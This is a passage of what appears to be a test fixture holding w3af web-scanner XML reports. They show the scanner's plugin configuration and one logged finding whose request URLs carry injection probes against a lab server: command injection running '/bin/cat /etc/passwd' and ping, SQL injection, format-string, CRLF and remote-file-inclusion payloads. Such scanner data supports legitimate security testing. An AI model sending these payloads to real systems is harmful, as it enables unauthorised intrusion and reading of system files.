    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: GET | http://domain:31337/&quot;. The exception was: &quot;__str__ returned non-string (type SysCallError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: GET | http://domain:31337/cake&quot;. The exception was: &quot;__str__ returned non-string (type SysCallError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: GET | http://domain:31337/choucroute&quot;. The exception was: &quot;__str__ returned non-string (type SysCallError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
</w3afrun>
"""


report_high = r"""<w3afrun start="1432111256" startstr="Wed May 20 10:40:56 2015" xmloutputversion="2.0">
    <w3af-version>w3af - Web Application Attack and Audit Framework
Version: 1.6.46
Revision: unknown
Branch: unknown
Local changes: No
Author: Andres Riancho and the w3af team.</w3af-version>
    <scaninfo target="http://10.12.68.43:31337/">
        <audit>
            <plugin name="file_upload">
                <config parameter="extensions" value="[u'gif', u'html']"/>
            </plugin>
            <plugin name="eval">
                <config parameter="use_time_delay" value="True"/>
                <config parameter="use_echo" value="True"/>
            </plugin>
            <plugin name="un_ssl"/>
            <plugin name="os_commanding"/>
            <plugin name="lfi"/>
            <plugin name="sqli"/>
            <plugin name="preg_replace"/>
            <plugin name="phishing_vector"/>
            <plugin name="generic">
                <config parameter="diff_ratio" value="0.35"/>
            </plugin>
            <plugin name="format_string"/>
            <plugin name="ldapi"/>
            <plugin name="redos"/>
            <plugin name="global_redirect"/>
            <plugin name="xpath"/>
            <plugin name="cors_origin">
                <config parameter="origin_header_value" value="http://w3af.org/"/>
            </plugin>
            <plugin name="htaccess_methods"/>
            <plugin name="dav"/>
            <plugin name="ssi"/>
            <plugin name="csrf"/>
            <plugin name="xss">
                <config parameter="persistent_xss" value="True"/>
            </plugin>
            <plugin name="ssl_certificate">
                <config parameter="minExpireDays" value="30"/>
                <config parameter="caFileName" value="w3af/plugins/audit/ssl_certificate/ca.pem"/>
            </plugin>
            <plugin name="xst"/>
            <plugin name="blind_sqli">
                <config parameter="eq_limit" value="0.9"/>
            </plugin>
            <plugin name="mx_injection"/>
            <plugin name="response_splitting"/>
            <plugin name="rfi">
                <config parameter="listen_address" value=""/>
                <config parameter="listen_port" value="44449"/>
                <config parameter="use_w3af_site" value="True"/>
            </plugin>
            <plugin name="frontpage"/>
        </audit>
        <infrastructure>
            <plugin name="find_vhosts"/>
            <plugin name="afd"/>
            <plugin name="detect_transparent_proxy"/>
            <plugin name="allowed_methods">
                <config parameter="execOneTime" value="True"/>
                <config parameter="reportDavOnly" value="True"/>
            </plugin>
            <plugin name="shared_hosting"/>
            <plugin name="fingerprint_WAF"/>
            <plugin name="server_header"/>
            <plugin name="php_eggs"/>
            <plugin name="favicon_identification"/>
            <plugin name="frontpage_version"/>
            <plugin name="http_vs_https_dist">
                <config parameter="httpPort" value="80"/>
                <config parameter="httpsPort" value="443"/>
            </plugin>
            <plugin name="dns_wildcard"/>
            <plugin name="detect_reverse_proxy"/>
            <plugin name="hmap">
                <config parameter="gen_fingerprint" value="False"/>
            </plugin>
            <plugin name="domain_dot"/>
            <plugin name="fingerprint_os"/>
            <plugin name="server_status"/>
            <plugin name="find_jboss"/>
            <plugin name="halberd"/>
        </infrastructure>
        <bruteforce/>
        <grep>
            <plugin name="symfony">
                <config parameter="override" value="False"/>
            </plugin>
            <plugin name="file_upload"/>
            <plugin name="wsdl_greper"/>
            <plugin name="form_autocomplete"/>
            <plugin name="http_in_body"/>
            <plugin name="svn_users"/>
            <plugin name="xss_protection_header"/>
            <plugin name="private_ip"/>
            <plugin name="motw"/>
            <plugin name="code_disclosure"/>
            <plugin name="blank_body"/>
            <plugin name="path_disclosure"/>
            <plugin name="strange_http_codes"/>
            <plugin name="credit_cards"/>
            <plugin name="cache_control"/>
            <plugin name="dom_xss"/>
            <plugin name="cross_domain_js">
                <config parameter="secure_js_file" value="w3af/plugins/grep/cross_domain_js/secure-js-sources.txt"/>
            </plugin>
            <plugin name="html_comments"/>
            <plugin name="http_auth_detect"/>
            <plugin name="strange_parameters"/>
            <plugin name="oracle"/>
            <plugin name="dot_net_event_validation"/>
            <plugin name="objects"/>
            <plugin name="error_500"/>
            <plugin name="meta_tags"/>
            <plugin name="lang"/>
            <plugin name="click_jacking"/>
            <plugin name="directory_indexing"/>
            <plugin name="password_profiling"/>
            <plugin name="get_emails">
                <config parameter="only_target_domain" value="True"/>
            </plugin>
            <plugin name="hash_analysis"/>
            <plugin name="url_session"/>
            <plugin name="error_pages"/>
            <plugin name="strange_reason"/>
            <plugin name="user_defined_regex">
                <config parameter="single_regex" value=""/>
                <config parameter="regex_file_path" value=""/>
            </plugin>
            <plugin name="strange_headers"/>
            <plugin name="ssn"/>
            <plugin name="feeds"/>
            <plugin name="analyze_cookies"/>
        </grep>
        <evasion/>
        <output>
            <plugin name="html_file">
                <config parameter="output_file" value="current.site.html"/>
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="text_file">
                <config parameter="verbose" value="True"/>
                <config parameter="output_file" value="current.site.txt"/>
                <config parameter="http_output_file" value="current.site.html"/>
            </plugin>
            <plugin name="console">
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="xml_file">
                <config parameter="output_file" value="current.site.xml"/>
            </plugin>
        </output>
        <mangle/>
        <crawl>
            <plugin name="web_spider">
                <config parameter="only_forward" value="False"/>
                <config parameter="follow_regex" value=".*"/>
                <config parameter="ignore_regex" value=""/>
            </plugin>
            <plugin name="robots_txt"/>
            <plugin name="digit_sum"/>
            <plugin name="url_fuzzer"/>
            <plugin name="content_negotiation"/>
        </crawl>
        <auth/>
    </scaninfo>
    <vulnerability id="[1029, 519, 522, 524, 525, 16, 534, 535, 536, 538, 539, 540, 541, 542, 547, 37, 604, 43, 58, 62, 64, 66, 67, 72, 75, 77, 78, 79, 81, 92, 94, 97, 98, 99, 102, 103, 549, 622, 122, 123, 860, 785, 164, 830, 696, 704, 203, 204, 205, 206, 207, 209, 211, 212, 213, 214, 215, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 229, 231, 232, 233, 235, 236, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 254, 258, 259, 260, 261, 263, 264, 266, 268, 270, 271, 272, 273, 274, 276, 277, 278, 280, 794, 283, 285, 800, 805, 295, 811, 307, 308, 310, 314, 315, 316, 318, 320, 321, 323, 326, 327, 328, 329, 330, 332, 333, 335, 336, 337, 338, 339, 340, 341, 854, 343, 344, 345, 346, 348, 861, 862, 351, 864, 354, 355, 356, 357, 359, 360, 361, 362, 364, 366, 367, 368, 370, 373, 375, 377, 378, 379, 892, 893, 396, 914, 921, 410, 413, 936, 426, 939, 432, 436, 952, 955, 451, 455, 968, 969, 464, 761, 984, 986, 848, 849, 1000, 1002, 491, 1015]" method="GET" name="Strange header" plugin="strange_headers" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The remote web server sent 177 HTTP responses with the uncommon response header &quot;host&quot;, one of the received header values is &quot;10.12.68.43:31337&quot;. The first ten URLs which sent the uncommon header are:
 - http://10.12.68.43:31337/%22
 - http://10.12.68.43:31337/%7Cping+-n+4+localhost
 - http://10.12.68.43:31337/yzzLwGYZ
 - http://10.12.68.43:31337/12+OR+12%3D12+
 - http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n
 - http://10.12.68.43:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd
 - http://10.12.68.43:31337/%7Cping+-c+4+localhost
 - http://10.12.68.43:31337/12%27+OR+%2712%27%3D%2712
 - http://10.12.68.43:31337/1+or+pg_sleep%283%29
 - http://10.12.68.43:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60
</description>
        <http-transactions>
            <http-transaction id="1029">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="519">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="522">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="524">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="525">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="16">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="534">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="535">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="536">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="538">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="539">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="540">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="541">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="542">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="547">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
